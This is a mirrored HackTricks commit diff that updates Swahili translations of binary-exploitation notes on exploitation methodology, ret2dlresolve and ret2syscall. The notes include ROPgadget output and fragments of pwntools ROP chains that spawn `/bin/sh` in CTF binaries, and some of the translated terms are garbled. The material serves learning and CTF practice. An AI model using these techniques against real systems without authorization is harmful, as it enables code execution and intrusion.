Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 14:40:37 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['binary-exploitation/basic-binary-exploitation-methodology/R

Browse source
This commit is contained in:
Translator 2024-04-13 14:16:43 +00:00
parent 3fdc2b85bb
commit c5745636af
7 changed files with 289 additions and 65 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
SUMMARY.md
View file

@ -709,7 +709,8 @@
* [Ret2syscall](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md)
* [Ret2syscall - ARM64](binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md)
* [Ret2vDSO](binary-exploitation/rop-return-oriented-programing/ret2vdso.md)
* [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming.md)
* [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md)
* [SROP - ARM64](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md)
* [Array Indexing](binary-exploitation/array-indexing.md)
* [Integer Overflow](binary-exploitation/integer-overflow.md)
* [Format Strings](binary-exploitation/format-strings/README.md)

62
binary-exploitation/basic-binary-exploitation-methodology/README.md
View file

@ -8,7 +8,7 @@ Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
@ -16,7 +16,7 @@ Njia nyingine za kusaidia HackTricks:
## Taarifa Msingi za ELF
Kabla ya kuanza kutumia udhaifu wowote, ni muhimu kuelewa sehemu ya muundo wa **binary ya ELF**:
Kabla ya kuanza kutumia udhaifu wowote ni muhimu kuelewa sehemu ya muundo wa **binary ya ELF**:
{% content-ref url="elf-tricks.md" %}
[elf-tricks.md](elf-tricks.md)
@ -30,7 +30,7 @@ Kabla ya kuanza kutumia udhaifu wowote, ni muhimu kuelewa sehemu ya muundo wa **
## Mbinu ya Kujaza Stack
Kwa mbinu nyingi ni vizuri kuwa na mpango ambapo kila mbinu itakuwa na manufaa. Kumbuka kuwa kinga sawa zitaathiri mbinu tofauti. Unaweza kupata njia za kuzidisha kinga kwenye kila sehemu ya kinga lakini sio katika mbinu hii.
Kwa mbinu nyingi ni vizuri kuwa na mpango ambapo kila mbinu itakuwa na manufaa. Kumbuka kuwa kinga sawa zitaathiri mbinu tofauti. Unaweza kupata njia za kuzidi kinga kwenye kila sehemu ya kinga lakini sio katika mbinu hii.
## Kudhibiti Mwelekeo
@ -39,10 +39,10 @@ Kuna njia tofauti unaweza kumaliza kudhibiti mwelekeo wa programu:
* [**Kujaza Stack**](../stack-overflow/) kwa kubadilisha kiashiria cha kurudi kutoka kwenye stack au EBP -> ESP -> EIP.
* Inaweza kuhitaji kutumia [**Kujaza Nambari**](../integer-overflow.md) kusababisha kujaa
* Au kupitia **Andika Nini Wapi hadi Utekelezaji**
* [**Vidokezo vya Format**](../format-strings/)**:** Tumia `printf` kuandika yaliyomo yoyote kwenye anwani yoyote.
* [**Kuorodhesha Array**](../array-indexing.md): Tumia kiashiria kilichopangwa vibaya ili kuweza kudhibiti baadhi ya mizunguko na kupata andika isiyo na mpangilio.
* [**Vidokezo vya Format**](../format-strings/)**:** Tumia `printf` kuandika yaliyomo yoyote kwenye anwani za yoyote.
* [**Kuorodhesha Array**](../array-indexing.md): Tumia kiashiria kilichopangwa vibaya ili kuweza kudhibiti baadhi ya mizunguko na kupata andika yoyote.
* Inaweza kuhitaji kutumia [**Kujaza Nambari**](../integer-overflow.md) kusababisha kujaa
* **bof hadi WWW kupitia ROP**: Tumia kujaza kijazo cha buffer kujenga ROP na kuweza kupata WWW.
* **bof hadi WWW kupitia ROP**: Tumia kujaza kijazo ili kujenga ROP na kuweza kupata WWW.
Unaweza kupata mbinu za **Andika Nini Wapi hadi Utekelezaji** katika:
@ -52,50 +52,50 @@ Unaweza kupata mbinu za **Andika Nini Wapi hadi Utekelezaji** katika:
## Mizunguko Isiyokuwa na Mwisho
Jambo la kuzingatia ni kwamba kawaida **udukuzi mmoja wa udhaifu huenda usiwe wa kutosha** kutekeleza udanganyifu wa mafanikio, hasa baadhi ya kinga zinahitaji kuzidishwa. Kwa hivyo, ni muhimu kujadili chaguzi kadhaa za **kufanya udhaifu mmoja uweze kutumiwa mara kadhaa** katika utekelezaji huo wa binary:
Jambo la kuzingatia ni kwamba kawaida **udukuzi mmoja wa udhaifu huenda usiwe wa kutosha** kutekeleza udanganyifu wa mafanikio, hasa baadhi ya kinga zinahitaji kuzidiwa. Kwa hivyo, ni muhimu kujadili chaguzi kadhaa za **kufanya udhaifu mmoja uweze kutumiwa mara kadhaa** katika utekelezaji huo wa binary:
* Andika kwenye mnyororo wa **ROP** anwani ya **kazi ya msingi** au kwenye anwani ambapo **udhaifu** unatokea.
* Andika kwenye mnyororo wa **ROP** anwani ya **`main` function** au kwenye anwani ambapo **udhaifu** unatokea.
* Kwa kudhibiti mnyororo sahihi wa ROP unaweza kutekeleza vitendo vyote katika mnyororo huo
* Andika anwani ya **`exit` kwenye GOT** (au kazi nyingine inayotumiwa na binary kabla ya kumaliza) anwani ya kurudi **nyuma kwa udhaifu**
* Kama ilivyoelezwa katika [**.fini\_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md#eternal-loop)**,** hifadhi hapa 2 kazi, moja kuita udhaifu tena na nyingine kuita**`__libc_csu_fini`** ambayo itaita tena kazi kutoka `.fini_array`.
* Andika anwani ya **`exit` kwenye GOT** (au kazi nyingine yoyote inayotumiwa na binary kabla ya kumaliza) anwani ya kurudi **nyuma kwa udhaifu**
* Kama ilivyoelezwa katika [**.fini\_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md#eternal-loop)**,** hifadhi kumbukumbu 2 hapa, moja kuita udhaifu tena na nyingine kuita**`__libc_csu_fini`** ambayo itaita tena kazi kutoka `.fini_array`.
## Malengo ya Udukuzi
### lengo: Piga simu kwa Kazi Iliyopo
### Lengo: Piga simu kwa Kazi Iliyopo
* [**ret2win**](./#ret2win): Kuna kazi katika nambari unayohitaji kupiga simu (labda na baadhi ya parameta maalum) ili kupata bendera.
* Katika bof ya kawaida bila [**PIE**](../common-binary-protections-and-bypasses/pie/) **na** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) unahitaji tu kuandika anwani kwenye anwani ya kurudi iliyohifadhiwa kwenye stack.
* Katika bof na [**PIE**](../common-binary-protections-and-bypasses/pie/), utahitaji kuzidisha
* Katika bof na [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), utahitaji kuzidisha
* Katika **bof ya kawaida bila** [**PIE**](../common-binary-protections-and-bypasses/pie/) **na** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) unahitaji tu kuandika anwani kwenye anwani ya kurudi iliyohifadhiwa kwenye stack.
* Katika bof na [**PIE**](../common-binary-protections-and-bypasses/pie/), utahitaji kuzidi kinga hiyo
* Katika bof na [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), utahitaji kuzidi kinga hiyo
* Ikiwa unahitaji kuweka vigezo kadhaa kuita kazi ya **ret2win** kwa usahihi unaweza kutumia:
* Mnyororo wa [**ROP**](./#rop-and-ret2...-techniques) **ikiwa kuna vifaa vya kutosha** kuandaa vigezo vyote
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming.md) (kwa hali unaweza kupiga simu hii) kudhibiti usajili mwingi
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (kwa hali unaweza kupiga simu hii ya mfumo) kudhibiti usajili mwingi
* Vifaa kutoka [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) na [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) kudhibiti usajili kadhaa
* Kupitia [**Andika Nini Wapi hadi Utekelezaji**](../arbitrary-write-2-exec/) unaweza kutumia udhaifu mwingine (si bof) kuita kazi ya **`ushindi`**.
* [**Kuhamisha Pointi**](../stack-overflow/pointer-redirecting.md): Kwa kesi stack ina pointi kwa kazi itakayoitwa au kwa herufi itakayotumiwa na kazi ya kuvutia (mfumo au printf), inawezekana kubadilisha anwani hiyo.
* Kupitia [**Andika Nini Wapi hadi Utekelezaji**](../arbitrary-write-2-exec/) unaweza kutumia udhaifu mwingine (si bof) kuita kazi ya **`win`**.
* [**Kuhamisha Pointi**](../stack-overflow/pointer-redirecting.md): Kwa kesi ambapo stack ina pointi kwa kazi itakayoitwa au kwa herufi itakayotumiwa na kazi ya kuvutia (mfumo au printf), inawezekana kubadilisha anwani hiyo.
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) au [**PIE**](../common-binary-protections-and-bypasses/pie/) inaweza kuathiri anwani.
* [**Vigezo visivyo na thamani**](../stack-overflow/uninitialized-variables.md): Huwezi kujua.
* [**Vigezo visivyoanzishwa**](../stack-overflow/uninitialized-variables.md): Kamwe hujui.
### lengo: RCE
### Lengo: RCE
#### Kupitia shellcode, ikiwa nx imelemazwa au kuchanganya shellcode na ROP:
* [**(Stack) Shellcode**](./#stack-shellcode): Hii ni muhimu kuhifadhi shellcode kwenye stack kabla au baada ya kubadilisha kiashiria cha kurudi na kisha **kuhamia kwake** kuitekeleza:
* **Katika kesi yoyote, ikiwa kuna** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** katika bof ya kawaida utahitaji kuzidisha (kuvuja) hiyo
* **Bila** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **na** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) inawezekana kuhama kwenye anwani ya stack kwani haitabadilika kamwe
* **Na** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) utahitaji mbinu kama [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) kuhama kwake
* **Na** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), utahitaji kutumia baadhi ya [**ROP**](../rop-return-oriented-programing/) **kupiga simu kwa `memprotect`** na kufanya ukurasa fulani uwe `rwx`, ili kisha **hifadhi shellcode hapo** (kupiga simu kwa kusoma kwa mfano) na kisha hama hapo.
* [**(Stack) Shellcode**](./#stack-shellcode): Hii ni muhimu kuhifadhi shellcode kwenye stack kabla au baada ya kubadilisha kiashiria cha kurudi kisha **piga simu kwake** kuitekeleza:
* **Katika kesi yoyote, ikiwa kuna** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** katika bof ya kawaida utahitaji kuzidi (kuvuja) hiyo
* **Bila** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **na** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) inawezekana kusonga kwenye anwani ya stack kwani haitabadilika kamwe
* **Na** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) utahitaji mbinu kama [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) kusonga kwake
* **Na** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), utahitaji kutumia baadhi ya [**ROP**](../rop-return-oriented-programing/) **kupiga simu kwa `memprotect`** na kufanya ukurasa fulani uwe `rwx`, ili kisha **hifadhi shellcode hapo** (kupiga simu kwa kusoma kwa mfano) na kisha piga simu hapo.
* Hii itachanganya shellcode na mnyororo wa ROP.
#### Kupitia syscalls
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Inatumika kuita `execve` ili kuendesha amri za aina yoyote. Unahitaji kuweza kupata **gadgets za kuita syscall maalum na parameta**.
* Ikiwa [**ASLR**](../common-binary-protections-and-bypasses/aslr/) au [**PIE**](../common-binary-protections-and-bypasses/pie/) zimeanzishwa utahitaji kuzishinda **ili kutumia ROP gadgets** kutoka kwenye binary au maktaba.
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming.md) inaweza kuwa na manufaa kwa kuandaa **ret2execve**
* Gadgets kutoka [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) na [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) ili kudhibiti baadhi ya rejista
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) inaweza kuwa na manufaa kwa kuandaa **ret2execve**
* Gadgets kutoka [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) na [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) kudhibiti baadhi ya rejista
#### Kupitia libc
* [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Inatumika kuita kazi kutoka kwenye maktaba (kawaida kutoka **`libc`**) kama vile **`system`** na baadhi ya hoja zilizoandaliwa (k.m. `'/bin/sh'`). Unahitaji binary ili **ipakie maktaba** na kazi unayotaka kuita (kawaida libc).
* [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Inatumika kuita kazi kutoka kwenye maktaba (kawaida kutoka kwa **`libc`**) kama vile **`system`** na baadhi ya hoja zilizoandaliwa (k.m. `'/bin/sh'`). Unahitaji binary ili **ipakie maktaba** na kazi unayotaka kuita (kawaida libc).
* Ikiwa **imekompiliwa tuli na hakuna** [**PIE**](../common-binary-protections-and-bypasses/pie/), **anwani** ya `system` na `/bin/sh` haitabadilika, hivyo ni rahisi kuzitumia tuli.
* **Bila** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **na kujua toleo la libc** lililopakiwa, **anwani** ya `system` na `/bin/sh` haitabadilika, hivyo ni rahisi kuzitumia tuli.
* Ikiwa kuna [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **lakini hakuna** [**PIE**](../common-binary-protections-and-bypasses/pie/)**, kwa kujua libc na binary ikitumia kazi ya `system`** ni rahisi **`ret` kwenye anwani ya system kwenye GOT** na anwani ya `'/bin/sh'` kwenye parameta (utahitaji kufikiria hili).
@ -110,18 +110,18 @@ Jambo la kuzingatia ni kwamba kawaida **udukuzi mmoja wa udhaifu huenda usiwe wa
#### Kupitia EBP/RBP
* [**Stack Pivoting / EBP2Ret / EBP Chaining**](../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md): Dhibiti ESP ili kudhibiti RET kupitia EBP iliyohifadhiwa kwenye steki.
* Ina manufaa kwa **kuzidi kidogo** kwenye mlipuko wa steki
* Ina manufaa kama njia mbadala ya kumaliza kudhibiti EIP wakati wa kutumia EIP kujenga mzigo wa data kwenye kumbukumbu na kisha kuruka kwenda kwake kupitia EBP
* Ina manufaa kwa mifumo ya steki yenye **makosa ya kimo cha moja**
* Ina manufaa kama njia mbadala ya kumaliza kudhibiti EIP wakati unatumia EIP kujenga mzigo wa data kwenye kumbukumbu na kisha kusonga kwenda kwake kupitia EBP
#### Mambo Mengine
* [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): Kwenye hali ambapo steki ina pointa kwenye kazi itakayoitwa au kwenye herufi itakayotumiwa na kazi ya kuvutia (kama vile system au printf), inawezekana kubadilisha anwani hiyo.
* [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): Ikiwa steki ina pointa kwenye kazi itakayoitwa au kwenye herufi itakayotumiwa na kazi ya kuvutia (kama vile system au printf), inawezekana kubadilisha anwani hiyo.
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) au [**PIE**](../common-binary-protections-and-bypasses/pie/) inaweza kuathiri anwani.
* [**Variables zisizowekwa**](../stack-overflow/uninitialized-variables.md): Kamwe hujui
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka mwanzo hadi kuwa shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:

20
binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
View file

@ -7,8 +7,8 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
@ -18,14 +18,14 @@ Njia nyingine za kusaidia HackTricks:
Kama ilivyoelezwa kwenye ukurasa kuhusu [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) na [**Relro**](../common-binary-protections-and-bypasses/relro.md), binaries bila Full Relro zitaresolve alama (kama vile anwani za maktaba za nje) mara ya kwanza wanapotumiwa. Urekebishaji huu hufanyika kwa kuita kazi **`_dl_runtime_resolve`**.
Kazi ya **`_dl_runtime_resolve`** inachukua kutoka kwenye steki marejeo kwa baadhi ya miundo inayohitajika ili **kuresolve** alama iliyotajwa.
Kazi ya **`_dl_runtime_resolve`** huchukua kutoka kwenye steki marejeo kwa baadhi ya miundo inayohitajika ili **kuresolve** alama iliyotajwa.
Hivyo basi, niwezekanavyo kufanya **miundo yote hii feki** ili kufanya urekebishaji wa kiungo cha kudumu kutatue alama iliyotakiwa (kama vile kazi ya **`system`**) na kuipiga na parameta iliyowekwa (k.m. **`system('/bin/sh')`**).
Hivyo basi, niwezekanavyo kufanya **miundo yote hii feki** ili kufanya urekebishaji wa kiungo cha kudumu kutatua alama iliyotakiwa (kama vile kazi ya **`system`**) na kuipiga kwa kiparameta kilichowekwa (k.m. **`system('/bin/sh')`**).
Kawaida, miundo yote hii hufanywa feki kwa kutengeneza **mnyororo wa ROP wa awali unaopiga simu kwa `read`** juu ya kumbukumbu inayoweza kuandikwa, kisha **miundo** na neno **`'/bin/sh'`** hupitishwa ili waweze kuhifadhiwa na kusomwa kwa kusoma kwenye eneo lililofahamika, na kisha mnyororo wa ROP unaendelea kwa kupiga simu **`_dl_runtime_resolve`**, ikimruhusu **kutatua anwani ya `system`** kwenye miundo feki na **kupiga simu kwa anwani hii** na anwani ya `$'/bin/sh'`.
Kawaida, miundo yote hii hufanywa feki kwa kutengeneza **mtandao wa ROP wa awali unaopiga simu kwa `read`** juu ya kumbukumbu inayoweza kuandikwa, kisha **miundo** na neno **`'/bin/sh'`** hupitishwa ili waweze kuhifadhiwa na kusomwa kwa kusoma kwenye eneo lililofahamika, na kisha mtandao wa ROP unaendelea kwa kupiga simu **`_dl_runtime_resolve`**, ikimruhusu **kutatua anwani ya `system`** kwenye miundo feki na **kupiga simu kwa anwani hii** na anwani ya `$'/bin/sh'`.
{% hint style="success" %}
Mbinu hii ni muhimu hasa ikiwa hakuna vifaa vya syscall (kutumia mbinu kama [**ret2syscall**](rop-syscall-execv/) au [SROP](srop-sigreturn-oriented-programming.md)) na hakuna njia za kuvuja anwani za libc.
Mbinu hii ni muhimu hasa ikiwa hakuna vifaa vya syscall (kutumia mbinu kama [**ret2syscall**](rop-syscall-execv/) au [SROP](srop-sigreturn-oriented-programming/)) na hakuna njia za kuvuja anwani za libc.
{% endhint %}
Unaweza kupata maelezo bora kuhusu mbinu hii katika nusu ya pili ya video:
@ -39,16 +39,16 @@ Ni lazima kufanya feki miundo 3: **`JMPREL`**, **`STRTAB`** na **`SYMTAB`**. Una
## Muhtasari wa Shambulio
1. Andika miundo feki mahali fulani
2. Weka hoja ya kwanza ya system (`$rdi = &'/bin/sh'`)
2. Weka hoja ya kwanza ya mfumo (`$rdi = &'/bin/sh'`)
3. Weka kwenye steki anwani za miundo kupiga simu **`_dl_runtime_resolve`**
4. Piga simu **`_dl_runtime_resolve`**
4. Piga simu kwa **`_dl_runtime_resolve`**
5. **`system`** itatauliwa na kupigwa simu na `'/bin/sh'` kama hoja
## Mfano
### Pure Pwntools
Unaweza kupata [**mfano wa mbinu hii hapa**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **ukiwa na maelezo mazuri sana ya mnyororo wa mwisho wa ROP**, lakini hapa ni shambulio la mwisho lililotumika:
Unaweza kupata [**mfano wa mbinu hii hapa**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **ukiwa na maelezo mazuri sana ya mtandao wa mwisho wa ROP**, lakini hapa ni shambulio la mwisho lililotumika:
```python
from pwn import *
@ -178,4 +178,4 @@ target.interactive()
* [https://youtu.be/ADULSwnQs-s](https://youtu.be/ADULSwnQs-s?feature=shared)
* [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve)
* [https://guyinatuxedo.github.io/18-ret2\_csu\_dl/0ctf18\_babystack/index.html](https://guyinatuxedo.github.io/18-ret2\_csu\_dl/0ctf18\_babystack/index.html)
* 32bit, hakuna relro, hakuna canary, nx, hakuna pie, msingi wa kujaza buffer na kurejea. Kudanganya, bof hutumiwa kuita `read` tena na sehemu ya `.bss` na ukubwa mkubwa, kuhifadhi `dlresolve` bandia meza za kupakia `system`, kurudi kwa msingi na kutumia tena bof ya awali kuita dlresolve na kisha `system('/bin/sh')`.
* 32bit, hakuna relro, hakuna canary, nx, hakuna pie, msingi wa kujaza buffer na kurejea. Kuitumia, bof inatumika kuita `read` tena na sehemu ya `.bss` na ukubwa mkubwa, kuhifadhi kwenye meza deepfake za `dlresolve` ili kupakia `system`, kurudi kwa msingi na kutumia tena bof ya awali kuita dlresolve na kisha `system('/bin/sh')`.

30
binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md
View file

@ -2,38 +2,38 @@
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka mwanzo hadi mtaalam wa juu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
Hii inafanana na Ret2lib, hata hivyo, katika kesi hii hatutaita kazi kutoka kwa maktaba. Katika kesi hii, kila kitu kitakuwa tayari kuita syscall `sys_execve` na baadhi ya hoja kutekeleza `/bin/sh`. Mbinu hii kawaida hutekelezwa kwenye faili za binary ambazo zimekamilishwa kwa njia ya static, hivyo kunaweza kuwa na vifaa vingi na maagizo ya syscall.
Hii inafanana na Ret2lib, hata hivyo, katika kesi hii hatutaita kazi kutoka kwa maktaba. Katika kesi hii, kila kitu kitakuwa tayari kuita syscall `sys_execve` na baadhi ya hoja kutekeleza `/bin/sh`. Mbinu hii kawaida hutekelezwa kwenye faili za binary ambazo zimekamilishwa kistatiki, hivyo kunaweza kuwa na vifaa vingi na maagizo ya syscall.
Ili kuandaa wito kwa **syscall** ni muhimu kuwa na usanidi ufuatao:
Ili kuandaa wito kwa **syscall** inahitajika usanidi ufuatao:
* `rax: 59 Taja sys_execve`
* `rdi: ptr kwa "/bin/sh" taja faili ya kutekeleza`
* `rsi: 0 taja hakuna hoja zilizopitishwa`
* `rdx: 0 taja hakuna mazingira ya mazingira yaliyopitishwa`
Kwa hivyo, kimsingi ni muhimu kuandika mfuatano wa herufi `/bin/sh` mahali fulani na kisha kutekeleza `syscall` (ukiwa makini na kujaza inayohitajika kudhibiti steki). Kwa hili, tunahitaji kifaa cha kuandika `/bin/sh` katika eneo lililofahamika.
Kwa hivyo, kimsingi ni lazima kuandika mfuatano `/bin/sh` mahali fulani na kisha kutekeleza `syscall` (ukiwa makini na kujaza inayohitajika kudhibiti steki). Kwa hili, tunahitaji kifaa cha kuandika `/bin/sh` katika eneo lililojulikana.
{% hint style="success" %}
Syscall nyingine ya kuvutia ya kuita ni **`mprotect`** ambayo ingemruhusu mshambuliaji **kurekebisha ruhusa ya ukurasa kwenye kumbukumbu**. Hii inaweza kuunganishwa na [**ret2shellcode**](../../stack-overflow/stack-shellcode/).
{% endhint %}
## Vifaa vya Kudhibiti Virejeshi
## Vifaa vya Usajili
Tuanze kwa kutafuta **jinsi ya kudhibiti virejeshi hivyo**:
Tuanze kwa kutafuta **jinsi ya kudhibiti vifaa hivyo**:
```bash
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
@ -41,7 +41,7 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```
Kwa kutumia anwani hizi ni **inawezekana kuandika maudhui kwenye stack na kuzipakia kwenye rejista**.
Kwa anwani hizi ni **inawezekana kuandika maudhui kwenye stack na kuzipakia kwenye rejista**.
## Andika string
@ -65,7 +65,7 @@ mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```
### Kiotomatiki ROP mnyororo
Amri ifuatayo inaunda mnyororo kamili wa `sys_execve` ROP ukitoa binary ya tuli wakati kuna vifaa vya andika-nini-mahali na maagizo ya syscall:
Amri ifuatayo inaunda mnyororo kamili wa `sys_execve` ROP ukipewa binary ya tuli wakati kuna vifaa vya andika-nini-popote na maagizo ya syscall:
```bash
ROPgadget --binary vuln --ropchain
```
@ -111,8 +111,8 @@ rop += writeGadget #Address to: mov qword ptr [rax], rdx
Ikiwa **unakosa vifaa**, kwa mfano kuandika `/bin/sh` kumbukumbu, unaweza kutumia **mbinu ya SROP kudhibiti thamani zote za rejista** (ikiwa ni pamoja na RIP na rejista za params) kutoka kwenye steki:
{% content-ref url="../srop-sigreturn-oriented-programming.md" %}
[srop-sigreturn-oriented-programming.md](../srop-sigreturn-oriented-programming.md)
{% content-ref url="../srop-sigreturn-oriented-programming/" %}
[srop-sigreturn-oriented-programming](../srop-sigreturn-oriented-programming/)
{% endcontent-ref %}
```python
from pwn import *
@ -183,8 +183,8 @@ target.interactive()
## Mifano Mingine & Marejeo
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)
* Biti 64, hakuna PIE, nx, andika kwenye kumbukumbu fulani ROP ili kuita `execve` na ruka hapo.
* Biti 64, hakuna PIE, nx, andika kwenye kumbukumbu fulani ROP ili kupiga simu kwa `execve` na ruka hapo.
* [https://guyinatuxedo.github.io/07-bof\_static/bkp16\_simplecalc/index.html](https://guyinatuxedo.github.io/07-bof\_static/bkp16\_simplecalc/index.html)
